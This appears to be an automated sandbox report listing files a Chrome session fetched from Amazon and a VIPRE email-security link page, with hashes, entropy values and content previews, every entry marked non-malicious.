                                                                                                                                                                                                                                                                Size (bytes):3380
                                                                                                                                                                                                                                                                Entropy (8bit):7.8866682294067845
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TJVlKHwoLbwLwjqsMcgErtLXe9B1vLF+bDk:7Ews8LUAEBLu9Hv5ow
                                                                                                                                                                                                                                                                MD5:46A59D173B0DAE5CEBAD7C2B12712532
                                                                                                                                                                                                                                                                SHA1:A71DEE95B28FE98A5EEBE79B89360F6C28F638A9
                                                                                                                                                                                                                                                                SHA-256:BD02DAFB1E8029EBAA97BAF6CE9BCC89BFE5018285864A820CD8F19F82690D59
                                                                                                                                                                                                                                                                SHA-512:59840B37892FC3BE4BFE2DAC5AD122D3B4FAFA48AFC727BF1E5568C237012CF4CBB8ECE39B63EBDBFEB9E7474B92A8CB6227434BF1DF26E56D6C091A4EBCB0C4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........J.."...............................................................!...1AQaq."Br...#23s.......Rc...%4CSTu.D..............................................!."12..AQ..............?..t(S{...v{X.............'..K...;b|U..=..f.d..H.=..sU..w..M.y...<.$B.7.H...&.H.....|.,V.!.~I..."0(....u.....wA#.NRfq._V...(.&9..Q|...-.s......+.8..S....r.9.e.........".I.r.........I.c.q..@.o._..p.p....R....[....i.e}..s.>...T.....GX .L4.0.......g<.q...........s.....nB.|..;...NYt..b..]G......J0....X .....J..B.(.......c......'.Sv.w..Nlu.1.P.g.x...n.w.h.......#A.;6[(.. .$M&.3..S..pr.......C..z.........=..L1vF.~..C..L.:.QQ......R.t.e...\...34.!?*\+lr|C..y..*X...fT..-.v.NtD.._CUa.[eAm..........)WR.6..F...e;.......W..2.mpe..6.g,>..G.jm.{...P3A.sD..j.T........h=W....Nl..|..H.......n{...I.C.....d~..r4.....w.P$c...o#.TBY...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):18692
                                                                                                                                                                                                                                                                Entropy (8bit):7.9309994475399055
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:TrtMnEigXzghlNopWgz1eRSGo36GlWXcWzjc:P+EigXzg7ypWUIJLc
                                                                                                                                                                                                                                                                MD5:81B32E56F2BDD8CC70BD71E69598A8F7
                                                                                                                                                                                                                                                                SHA1:1F5E0D177D2A411FE09AFC9053F12C1E346A5190
                                                                                                                                                                                                                                                                SHA-256:F91770A26A56A7DF5B82C9FFA14123203A5B3A19565E55BBC8C7D174834E3E14
                                                                                                                                                                                                                                                                SHA-512:A988E44919FEAF40B603A9D4C48DFB1D82FD844D051D002E6AF06A3696F8C5F7926938B3AEA02A3FDE23AC3D3C0402CFB69DA19BE0FD2AD272C73A065ACDF61D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5......................................................................................................................pv....................#..9d...E.....m..3b.}..........................85VR.i.`....z..3...G;.jv..i...@........5....Eh,.U....C'QV........s.P..Sjt..t..m=.>.8.c`.7A......[[................c0..%...3.<.m.z3......_..\r.......0f.j?.R.{..}....:Y..P...F...[Y.S.@.......c..7c.{.g]#.lsa...W..8.9.k.y..#.......4.~..>w/.6[..kWa..>.kl.A(..........g53f......|*u1.eD......g..4.......0..j...#T.\...........G.$...]m.5.c.L.S9..+.l..0......................;t>G.}@.MML.k..]..(........89Y1J..'.J...Q...L.V......z..OC..................m.7......{.......d....f...K$$y.#u...z.}..+.d.....{..{.e._....O.v3Ol#..y..s`......VK.......f..........f......S[.[..F.Th.s{....h...]t....B.6..X..c....|..re..z..H
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):58
                                                                                                                                                                                                                                                                Entropy (8bit):4.364819634194334
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:j4OiLEF1vjdKDMJldsM9fkLHn:j4DErdKDMbdsN
                                                                                                                                                                                                                                                                MD5:B1935F865A4EADE8564B6EF4B022F27F
                                                                                                                                                                                                                                                                SHA1:F42746792E52473C4D9E152ACEB7080550D3C1E5
                                                                                                                                                                                                                                                                SHA-256:21C52B1622A4539BF82DBC7FD4A2638CDDE3B8151697EB5C4D3DBB426576FBAA
                                                                                                                                                                                                                                                                SHA-512:9693E0CAD83BF557BDADDE705241F580ED85DB0375AC381A21FC10E020FF96386E68514356C3B15FDCAF7BDCB8D74804D794E63D5BC9F58245DBB18B6C9A8062
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net/test.png
                                                                                                                                                                                                                                                                Preview:Standard Amazon AWS CloudFront Profile Experiment Response
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?ld&v=0.294992.0&id=P3EBDX30THKD0V702NQB&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=P3EBDX30THKD0V702NQB&ue=5&bb=2093&ns=2108&ne=2133&cb=2134&x2=2135&x3=2137&cf=2137&af=2140&fn=2141&be=2520&fp=2555&fcp=2555&pc=7557&tc=-1023&na_=-1023&ul_=-1723469077906&_ul=-1723469077906&rd_=-1723469077906&_rd=-1723469077906&fe_=-1020&lk_=-995&_lk=-995&co_=-995&_co=-267&sc_=-994&rq_=-266&rs_=-28&_rs=256&dl_=-21&di_=2600&de_=2600&_de=2600&_dc=7557&ld_=7557&_ld=-1723469077906&ntd=0&ty=0&rc=0&hob=4&hoe=5&ld=7557&t=1723469085463&ctb=1&rt=cf:18-0-14-4-2-5-1_af:18-0-14-4-2-5-0_ld:49-21-14-5-9-5-1&pty=ShoppingCart&spty=Cart&pti=undefined&tid=P3EBDX30THKD0V702NQB&aftb=1&lob=1
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (586)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):23071
                                                                                                                                                                                                                                                                Entropy (8bit):5.362022943440696
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:sy2yQbKsU21yv1Dkd/boShcX4l35wG0oVEnHc5gCACPjNiFQ/2CW+LjdzO7hdV8s:sy2yQbKsU21Wkd/0ShcX4/wposHc5gDh
                                                                                                                                                                                                                                                                MD5:62192A2790221BF486B9095F17BEF7D4
                                                                                                                                                                                                                                                                SHA1:DC949DE562891047F3EFAD89167D1EC8FCD7F674
                                                                                                                                                                                                                                                                SHA-256:9EEAE9DBCF91FA4C0161C41AD6D85E8B088EE44E8C76260582D9F7CB0A20EB52
                                                                                                                                                                                                                                                                SHA-512:1316452B542FAF980332F54CA384A1E4C6D2CBD6C0049E9B7619D47C57122D4489BB6B3FCF466AB080349BE0FE9E1B30F6DA184F2F818FDEA20F48C774D3BEC0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:P.register("cvfVersion",function(){return{version:"0.1.0.0-2024-08-09"}});"use strict";.P.when("A","cvfFormDataGenerator","cvf-client-side-counters-util","ready").register("cvf-account-switcher",function(b,k,a){function n(a,d){a.preventDefault();var c=k.retrieveFormData(a.target),h=c.inputData.serializeArray();h.push(e(a.target));b.ajax(window.location.protocol+"//"+window.location.host+c.requestPath,{method:"POST",params:h,success:d,error:f})}function e(a){a=h(a);var b=a.attr("name");b||(b=a.closest(".cvf-account-switcher-sign-out-link").attr("data-name"));var d=a.attr("value");d||.(d=a.closest(".cvf-account-switcher-sign-out-link").attr("data-value"));return{name:b,value:d}}function f(a,d,c){b.trigger(p.error,c)}function c(a){var b=/([^@\s]+)@([a-zA-Z0-9_-]+)(\.[a-zA-Z0-9._-]+)/ig.exec(a);if(null!==b){a=b[1];a=h.trim(a);var d=a.length;if(1!==d){for(var c=a.charAt(0),e=0;e<d-2;e++)c+="*";a=c+=a.charAt(d-1)}a+="@";c=b[2];c=h.trim(c);d=c.length;c=c.charAt(0);for(e=0;e<d-1;e++)c+="*";ret
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (560)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):22850
                                                                                                                                                                                                                                                                Entropy (8bit):5.310742006440315
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:D25pTmt/w5MqCmT2yuER7oBJcj6bhAsoAFXE6X8g+KUyer1CPC3ei1ZQnGr:DHI2kQBGj6F7oAFXE6Xt+dyeBCPC3ei9
                                                                                                                                                                                                                                                                MD5:BAF5426671F29B1217B5550FA9BDE7B8
                                                                                                                                                                                                                                                                SHA1:8A588BC594DF4045EDEE10A07F2722B09C7325AF
                                                                                                                                                                                                                                                                SHA-256:7685C328FE8BC4DBC0C5FC6CF3AD21E56ECCBD325542FFEFBD653327073219C6
                                                                                                                                                                                                                                                                SHA-512:32F339DF56F026FB459A7A5F542ED52CE90986BC15B02D5469825EA60E0A95554042C05602A4FC5316736BC3481067E757E7EB0E840EF097A21FC385B9A1EB46
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/21KBCItCElL._RC%7C21S7HDrs82L.js,21t7CIR3bHL.js_.js?AUIClients/ListsDesktopCartMoveToListAssets&ArHtld5a"
                                                                                                                                                                                                                                                                Preview:(function(d){var f=window.AmazonUIPageJS||window.P,k=f._namespace||f.attributeErrors,a=k?k("ListsCommonUtilityAssets",""):f;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,f,k){d.when("A").register("al-ajax-response-state-parser",function(a){var b=a.$;return{getState:function(c){c=b(c).filter("#listsAjaxResponseStateSection");var e=b("#listsAjaxResponseStateSection");e&&0<=e.length&&e.remove();b(c).appendTo("body");a.state.parse();c=a.state("listsAjaxResponseState")||.{};return{hasError:c.hasError,authRequired:c.authRequired,authUrl:c.authUrl,error:c.error}}}});"use strict";d.when("A","al-bottomsheet-with-fallback","iphone-x-detector").register("bottom-sheet-utils",function(a,b,c){var e=a.$;a.declarative("al-sheet-with-fallback","click",function(e){e.$event.preventDefault();var a=e.data;e=b.create(b.buildComponentParams(a.componentName,a.showCloseButton,c.getAdjustedHeightPx(a.bottomsheetHeight),a.popoverHeight,a.popoverWidth,a.headerForPopover,a.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8552
                                                                                                                                                                                                                                                                Entropy (8bit):7.836219212963423
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:WWB4YHuf//BGE4Eb6osoZR77m8ZQ46Q+CkODl5B0X/:v+YHuXF6osS97HZQ9QwsnB0v
                                                                                                                                                                                                                                                                MD5:F624BB6683A28BA068F17CC982FE318D
                                                                                                                                                                                                                                                                SHA1:BB113F823C519DEC019F106ADE3338F6CD034349
                                                                                                                                                                                                                                                                SHA-256:9AE1F9AFC6B3BE1810CC7C5971D800FE1D39D18512D729E9829C2319E55B092C
                                                                                                                                                                                                                                                                SHA-512:53B80DAD33011242781820EC4D76083134CA2EB11BC7BBE3A4AB50E223824EFEAD626A0D58C5FF6D3B87005CA553A7094FAB9FCB26066C4BB2CB356828346E8E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......0.{.."..........6..............................................................................................................f..k.f..k.f..k.f..k.f..k.f..k.f..........9ZT.........`.2........9ZT5.".z.O.....]..l....xw..t.....g.l/.qHF..e.M.....m.....&...d.%...9..........r...B]e..y..7...|..\i3Lt\..._R.O(...m...E0.....c=)..k....t..>.X..9.(.......3..F.9.<..#.~..-.o..T...@}.j..@..w..#.:.=...y.Y./=-_H.Z...0e........r...~.7-.4....a'....8.Sb....C.....)`.<...........V.....2ln...+.*.3..~....6.&..X..................v..1.........P....%......Lq.|sF..p$1#K1...m.i.a,..d"X<...........T..........<................\-...\-...\-...\-...\-...\-.............'I.L.........av-..............4..s..u......y..+.v..XW......3)......#.......).G.A5...}.6.6.&d...........~..&/a.........>..]9...2...........m......u.=a........4.Jw.A...i
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4962)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5010
                                                                                                                                                                                                                                                                Entropy (8bit):5.3247438309708635
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:t73pKmDZxs9Iwbfln62gb0ZZRiiB4hA/27A3hGj60nV:ZsCZe9IwLlnRgb0HUCy7+fk
                                                                                                                                                                                                                                                                MD5:49864A8E125D378BCB2C452E5F949AB9
                                                                                                                                                                                                                                                                SHA1:16813CF45B19A19293AE85ECC3D7E6E18F95E75C
                                                                                                                                                                                                                                                                SHA-256:0ED4CE10806A4CFFBC0A283BEF8AD076EDF2D070A3F72979F825595790966EEE
                                                                                                                                                                                                                                                                SHA-512:B375DFE76BDB7DC954CC68A451EE7AA166709A0735970DCFAA2B60EEEA3C7C83C1040288D96318131716A3B573DF2D1BD1A0803115784BD6E428F7EF2C97975A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://url6.mailanyone.net/static/js/main.fbcc4ef1.chunk.js
                                                                                                                                                                                                                                                                Preview:(this["webpackJsonpvp-webapp-clicksmart"]=this["webpackJsonpvp-webapp-clicksmart"]||[]).push([[0],{134:function(n,t,e){"use strict";function c(n){window.location.href=n}e.d(t,"a",(function(){return c})),e.d(t,"b",(function(){return r})),e.d(t,"c",(function(){return s}));var o=e(0),a=e(97);function r(n,t){Object(o.useEffect)((function(){!function(n,t){var e=a.a.t("URL Protection"),c=a.a.t("VIPRE Email Security");document.title="".concat(null!==n&&void 0!==n?n:e," | ").concat(null!==t&&void 0!==t?t:c)}(n,t)}),[n,t])}function s(n,t){var e=Object(o.useRef)(),c=Object(o.useRef)((function(){}));return Object(o.useEffect)((function(){e.current=n}),[n]),Object(o.useEffect)((function(){if(null!==t){var n=setInterval((function(){e.current&&e.current()}),t),o=function(){clearInterval(n)};return c.current=o,o}}),[t]),{clear:c.current}}},138:function(n,t,e){"use strict";var c;e.d(t,"a",(function(){return c})),function(n){n.INFO="INFO",n.WARNING="WARNING",n.DANGER="DANGER"}(c||(c={}))},207:function(
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3076
                                                                                                                                                                                                                                                                Entropy (8bit):7.876345042072062
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rmwYN1kpTrLvvvKaORyPFmtl8j+KT/AGyASNsCtNaeH7F88d2fkUKv2J3lscX:TzN1kpjUyE6ToGyANebF+seXscDT
                                                                                                                                                                                                                                                                MD5:C75E02A77BCA6C29B06FD72B498E2DE5
                                                                                                                                                                                                                                                                SHA1:C1041D5789652AF895F73E846DDFBD6E61244602
                                                                                                                                                                                                                                                                SHA-256:CFA95B85E4091DDEA25312C89FAA28306DBDD539C13A6DBC8D432891EB0471FD
                                                                                                                                                                                                                                                                SHA-512:AFD88E377B2B7895F59762464FA9CD21959179EBF373FA693F9CC012471556E532186D0C55F317123795937C9A4F2E94E6E864540B887ED240328EDDC5C06A87
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!1."A2QRabq.B......#34c..$Sr.................................................1.!...."2AQb............?...*\..(..(..(..(../Y..8?i.'XP..z.......Pj....x...|f...+N.Ad.8...M8...H.....H.Fa..~.VL3$....".....[.ea.A....JR.JR.JR.JR.JR.JR.JR.Q.9...?K.Qu.&BA..,..g.A.z...!W.5B.|i.Y.%...X.N.m..x.{3.O.O."./A../...Z..4.]......EO..*.{....u..E...E..,......*GJlf.&.M..{....d~..LA..a.....5.r...k...c.&..!..<....._.@/..\r.r..K....KG......%...su..=....)J.)J.)J.)J.)J.)_..5g.."+.v8TU......M...:.i.&.Ct.....+h..........4..&..q.=...\.K.L...m...-`..G.]........[..E.xSL....H..n.7.L....t.....4.iJ.[....V`.p....{u.c....e..%..i..4/t...33/.....;..x.Mn{.w.W.../..U".+......-]....3....7..|....s]T.p{...+..)JP)JP)JP)JP)JP*....in.a='C-.~....8...2..$.6...>...d6....A...{..Mg^.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26ctb%3D1%26sc0%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb0%3D197%26pc0%3D4836%26ld0%3D4836%26t0%3D1723469068772%26csmtags%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:4836
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26ctb%3D1%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D64%26pc0%3D402%26ld0%3D402%26t0%3D1723469074420%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:402
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8279
                                                                                                                                                                                                                                                                Entropy (8bit):4.80472773710838
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:NXK0lKxspheicMgCSywVg+9GgZi6FVLZmMDWD+LAQ8zZOsWJ2p+eV5S+rTXrU8Kc:NXVl4wg4wVg+9dg3Kp8QOjeZuj2XW
                                                                                                                                                                                                                                                                MD5:CF1534646ECB2265F727E093BDB8EAFF
                                                                                                                                                                                                                                                                SHA1:10014B8A4A6D60F3FC8744ACBB3051F1EE8BE698
                                                                                                                                                                                                                                                                SHA-256:BF4C7DFDC746160EA4410DCB2A3E940FE4271D1BEDBA7D2C7847A90B02440468
                                                                                                                                                                                                                                                                SHA-512:1F5628EAC34C3201886B120BE9263329798AE942FCC4EE4736C008F5F1B959BA5E43B43D7676C7A09D660B3AAFD82CBC442E88832937C344BBA1503583E562BD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1106.02 634.55"><defs><style>.cls-1{fill:#eaeded;}.cls-2{fill:#d5dbdb;}.cls-3{fill:#889596;}.cls-4{fill:#b8dde2;}.cls-5{fill:#fff;}.cls-6{fill:#9fcbce;}.cls-7{fill:#fafafa;}.cls-8{fill:#cde6e0;}.cls-9{fill:#b4d1ca;}.cls-10{fill:#eefaf5;}.cls-11{fill:#eff5ed;}.cls-12{fill:#cee0ad;}</style></defs><title>kettle-desaturated</title><g id="Layer_2" data-name="Layer 2"><g id="kettle"><path id="background" class="cls-1" d="M1106,401.13H0s-3.86,163,286.1,163c214,0,381.91,70.42,601.91,70.42S1106,401.13,1106,401.13Z"/><g id="echo"><path id="echo-shadow" class="cls-2" d="M562.47,429.56C562.38,435.32,684.75,440,795.22,440s167.2-4.67,167.29-10.43-56.5-10.42-167-10.42S562.56,423.81,562.47,429.56Z"/><polygon id="echo-back" class="cls-3" points="1012.92 155.71 1020.09 155.71 1020.09 418.21 958.21 439.64 1012.92 155.71"/><polygon id="echo-front" class="cls-4" points="787.69 155.71 1012.92 155.71 958.21 439.64 732.97 439.64 787.69 155.71"/><polygon id=
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (550)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12513
                                                                                                                                                                                                                                                                Entropy (8bit):5.434628844075745
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Q4IPhv98IxQ8I62eZIFxFXwFacRLQl7DFc/WY7//mXDsBRYK:yPhv9txVIje5RLQl7i/visXX
                                                                                                                                                                                                                                                                MD5:47539E88D4690AB67703ABD383E7B3DF
                                                                                                                                                                                                                                                                SHA1:A901C87377138063B884A6ED9173F1CC142A67B5
                                                                                                                                                                                                                                                                SHA-256:6733522B047B40AAC2DA228652E13FFAEDD219D2EB491D2EFF0BA004E7D189C5
                                                                                                                                                                                                                                                                SHA-512:87DE7FED7ABCD7916BC96B26495B47272A2F6B04640C5D79550C990E21694D3ED2544D4DB315E84151A033330D6F65D13206E426960355078E2982D8492A927A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/31CuRA-rQfL.js?AUIClients/QuantitySliderAssets&EHmCbOad
                                                                                                                                                                                                                                                                Preview:(function(m){var r=window.AmazonUIPageJS||window.P,w=r._namespace||r.attributeErrors,q=w?w("QuantitySliderAssets",""):r;q.guardFatal?q.guardFatal(m)(q,window):q.execute(function(){m(q,window)})})(function(m,r,w){function q(t,n){try{m.register(t,n)}catch(f){if(-1===f.message.indexOf("reregistered by QuantitySliderAssets"))throw f;}}function y(){var t=arguments;return{register:function(n,f){try{m.when.apply(m,t).register(n,f)}catch(h){if(-1===h.message.indexOf("reregistered by QuantitySliderAssets"))throw h;.}}}}m.when("QuantitySliderAssetDuplicationGuard").execute(function(t){t.when("A","quantity-slider-utils","qs-cart-update-utils").register("qs-cart-update-handler",function(n,f,h){function l(a){p||(p="quantity-slider-widget-"+a);return p}function e(a,b){if(!b.atcFormSubmitDisabled){if((a=a.$target&&a.$target.closest(".qs-atc-form"))&&0!==a.length)return a;m.log("Missing $form object","ERROR",l(b.clientName))}}function b(b,x,k){n.trigger(f.ACTIONS.ADD_TO_CART_SUBMIT_START,{asin:b,cartT
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 240 x 735, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6829
                                                                                                                                                                                                                                                                Entropy (8bit):7.762659774988712
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Y6JdU2FlfkTCpJxR0P10gvhbeNs359AZGcF80PnVmohveKKlNGsD6pqGZ7Afb3F:FjkTCxO0gvhsLBp1hm70pRZSp
                                                                                                                                                                                                                                                                MD5:13FD5F8C8447783E11D8B9717A38CF2F
                                                                                                                                                                                                                                                                SHA1:553793E4D98E5A3C349047B9D9097EECF5D799D9
                                                                                                                                                                                                                                                                SHA-256:9B280F263A12EC4C9B718DCA074F908493A05A81EB5F9D29023949E33EBD3152
                                                                                                                                                                                                                                                                SHA-512:E06A02652E492FFEED3BA4D324C2DC16475FCCE4A884472B5FD28D0BAE4AA5434BDB06536E7827360ECED8AD82A193B5E78FB8FABFCE8F6BCE86A36C57187FE8
